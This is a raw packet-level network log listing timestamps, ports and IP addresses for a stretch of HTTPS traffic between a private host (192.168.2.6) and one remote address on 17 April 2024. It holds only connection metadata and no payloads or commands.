Apr 17, 2024 08:39:25.312077045 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.312117100 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.312124014 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.313859940 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.313879013 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.313947916 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.313957930 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.313999891 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.315563917 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.315579891 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.315639019 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.315648079 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.315690041 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.317519903 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.317588091 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.317622900 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.317631006 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.317656994 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.317683935 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.319169044 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.319214106 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.319241047 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.319251060 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.319279909 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.319300890 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.321336985 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.321382046 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.321407080 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.321419001 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.321449995 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.321463108 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.323077917 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.323121071 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.323147058 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.323158979 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.323188066 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.323199987 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.324887037 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.324928999 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.324961901 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.324975967 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.324994087 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.325016022 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.326663971 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.326708078 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.326736927 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.326747894 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.326780081 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.326796055 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.328836918 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.328881979 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.328916073 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.328931093 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.328963995 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.328980923 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.330605030 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.330646038 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.330679893 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.330693007 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.330718040 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.330745935 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.332412958 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.332454920 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.332487106 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.332494974 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.332525969 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.332540989 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.334131002 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.334172010 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.334203005 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.334233999 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.334261894 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.334269047 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.336781025 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.336834908 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.336863041 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.336873055 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.336899996 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.336919069 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.338223934 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.338264942 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.338293076 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.338300943 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.338324070 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.338347912 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.340024948 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.340068102 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.340110064 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.340121984 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.340133905 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.340168953 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.341655016 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.341696978 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.341727018 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.341737032 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.341768026 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.341787100 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.344619989 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.344661951 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.344693899 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.344706059 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.344747066 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.345911980 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.345935106 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.346012115 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.346019983 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.346060991 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.347342968 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.347362995 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.347450018 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.347457886 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.347498894 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.400916100 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.400962114 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.401056051 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.401067972 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.401114941 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.402755022 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.402796030 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.402836084 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.402846098 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.402875900 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.402894020 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.404412985 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.404457092 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.404490948 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.404498100 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.404534101 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.404556990 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.406224012 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.406264067 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.406296015 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.406301975 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.406346083 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.408823013 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.408864975 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.408900023 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.408906937 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.408948898 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.410608053 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.410650969 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.410682917 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.410695076 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.410727978 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.410748005 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.412379980 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.412420034 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.412451982 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.412460089 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.412512064 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.412512064 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.414585114 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.414627075 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.414655924 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.414664030 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.414707899 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.414727926 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.416328907 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.416371107 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.416393995 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.416402102 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.416444063 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.416457891 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.418093920 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.418133974 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.418165922 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.418171883 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.418204069 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.418225050 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.419871092 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.419913054 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.419939041 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.419950962 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.419989109 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.420007944 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.421629906 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.421674013 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.421705008 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.421710968 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.421751022 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.423837900 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.423881054 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.423909903 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.423916101 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.423955917 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.425651073 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.425698042 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.425725937 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.425734997 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.425776958 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.425795078 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.427386045 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.427428961 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.427459002 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.427465916 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.427500010 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.429137945 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.429181099 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.429207087 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.429217100 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.429256916 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.429275036 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.430936098 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.430980921 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.431010008 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.431016922 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.431046009 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.431063890 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.433106899 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.433146000 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.433208942 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.433218002 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.433263063 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.434854031 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.434895992 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.434921026 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.434930086 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.434957027 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.434978008 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.436629057 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.436674118 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.436698914 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.436708927 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.436733007 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.436753988 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.438417912 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.438462019 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.438494921 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.438504934 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.438525915 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.438546896 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.440160990 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.440203905 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.440252066 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.440260887 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.440300941 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.440323114 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.442322969 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.442364931 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.442419052 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.442428112 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.442471981 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.444046974 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.444088936 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.444124937 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.444133043 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.444171906 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.445915937 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.445957899 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.445987940 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.445997000 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.446049929 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.447752953 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.447772980 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.447841883 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.447854996 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.447899103 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.449506998 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.449525118 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.449580908 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.449589968 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.449620962 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.451014996 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.451035023 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.451077938 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.451086044 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.451109886 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.451124907 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.452702045 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.452722073 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.452768087 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.452776909 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.452796936 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.452821970 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.453674078 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.453695059 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.453761101 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.453769922 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.453807116 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.454602957 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.454622984 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.454684973 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.454693079 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.454729080 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.456429958 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.456449032 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.456526041 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.456532001 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.456568956 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.457914114 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.457947969 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.457989931 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.457997084 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.458024979 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.458051920 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.458956003 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.458976030 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.459062099 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.459072113 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.459130049 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.459913969 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.459932089 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.459975004 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.459985971 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.460016012 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.460036039 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.461710930 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.461730957 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.461807966 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.461815119 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.461848974 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.463170052 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.463210106 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.463255882 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.463262081 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.463293076 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.463313103 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.464263916 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.464284897 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.464349031 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.464356899 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.464395046 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.465205908 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.465240955 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.465271950 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.465276003 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.465322018 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.467154980 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.467186928 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.467258930 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.467266083 CEST	443	49700	172.67.215.45	192.168.2.6
Apr 17, 2024 08:39:25.467284918 CEST	49700	443	192.168.2.6	172.67.215.45
Apr 17, 2024 08:39:25.467295885 CEST	49700	443	192.168.2.6	172.67.215.45
